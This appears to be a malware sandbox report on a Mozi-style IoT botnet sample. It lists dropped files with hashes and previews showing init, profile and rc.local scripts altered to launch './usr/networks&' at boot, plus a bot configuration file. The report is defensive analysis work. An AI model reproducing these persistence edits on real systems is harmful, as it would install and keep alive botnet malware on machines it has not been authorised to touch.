                                                                                                                        SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/checkfs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):147
                                                                                                                        Entropy (8bit):4.7173471450646
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                        MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                        SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                        SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                        SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/checkroot-bootclean.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):250
                                                                                                                        Entropy (8bit):4.872318043360431
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                        MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                        SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                        SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                        SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/checkroot.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3111
                                                                                                                        Entropy (8bit):4.922960717312443
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                        MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                        SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                        SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                        SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                        /etc/init.d/hostname.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):404
                                                                                                                        Entropy (8bit):5.01878905639229
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                        MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                        SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                        SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                        SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/hwclock.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountall-bootclean.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):249
                                                                                                                        Entropy (8bit):4.8912088003487595
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                        MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                        SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                        SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                                        SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountall.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):148
                                                                                                                        Entropy (8bit):4.74526082342869
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                        MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                        SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                        SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                        SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountdevsubfs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56
                                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                        MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                        SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                        SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                        SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountkernfs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):56
                                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                        MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                        SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                        SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                        SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountnfs-bootclean.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):249
                                                                                                                        Entropy (8bit):4.8916208864241355
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                        MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                        SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                        SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                        SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/mountnfs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):190
                                                                                                                        Entropy (8bit):3.788938232230384
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                        MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                        SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                        SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                        SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/init.d/umountnfs.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):145
                                                                                                                        Entropy (8bit):4.730534942677594
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                        MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                        SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                        SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                        SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                        /etc/profile.d/Z97-byobu.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/profile.d/apps-bin-path.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/profile.d/bash_completion.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/profile.d/cedilla-portuguese.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/profile.d/vte-2.91.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/rc.local
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOOR3n:M
                                                                                                                        MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                        SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                        SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                        SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&.exit 0.
                                                                                                                        /etc/rcS.d/S95baby.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):25
                                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                        Malicious:true
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                        • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                        • Filename: i, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: bad_file, Detection: malicious, Browse
                                                                                                                        • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                                        /etc/wpa_supplicant/action_wpa.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):714
                                                                                                                        Entropy (8bit):5.329653855555143
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                        MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                        SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                        SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                        SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                        /etc/wpa_supplicant/functions.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/wpa_supplicant/ifupdown.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3368
                                                                                                                        Entropy (8bit):5.3288648372922625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                        MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                        SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                        SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                        SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                        /tmp/.config
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):317
                                                                                                                        Entropy (8bit):4.907338691609266
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NN:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuzbf
                                                                                                                        MD5:782AD22FB77C8FD8D1B45F440B55D197
                                                                                                                        SHA1:73FAB9C7F4B8E3339997598A25A7D7D581800596
                                                                                                                        SHA-256:DF8F20A8FD27238420D34B79EEA793AD788C9CBA3D1BFD42E79D964EC2BCD3DA
                                                                                                                        SHA-512:5C95FB5548571F98164602EEA2E7F8C861FF351609D5AA2E971D68877968D1EBD05AB68D6AFC6D467B0C2323D2E1AA84BA8341FAB116C69E4F5D6622B1CEC74A
                                                                                                                        Malicious:false
                                                                                                                        Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]
                                                                                                                        /usr/bin/gettext.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1914
                                                                                                                        Entropy (8bit):4.829445473341419
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                        MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                        SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                        SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                        SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                        Malicious:true
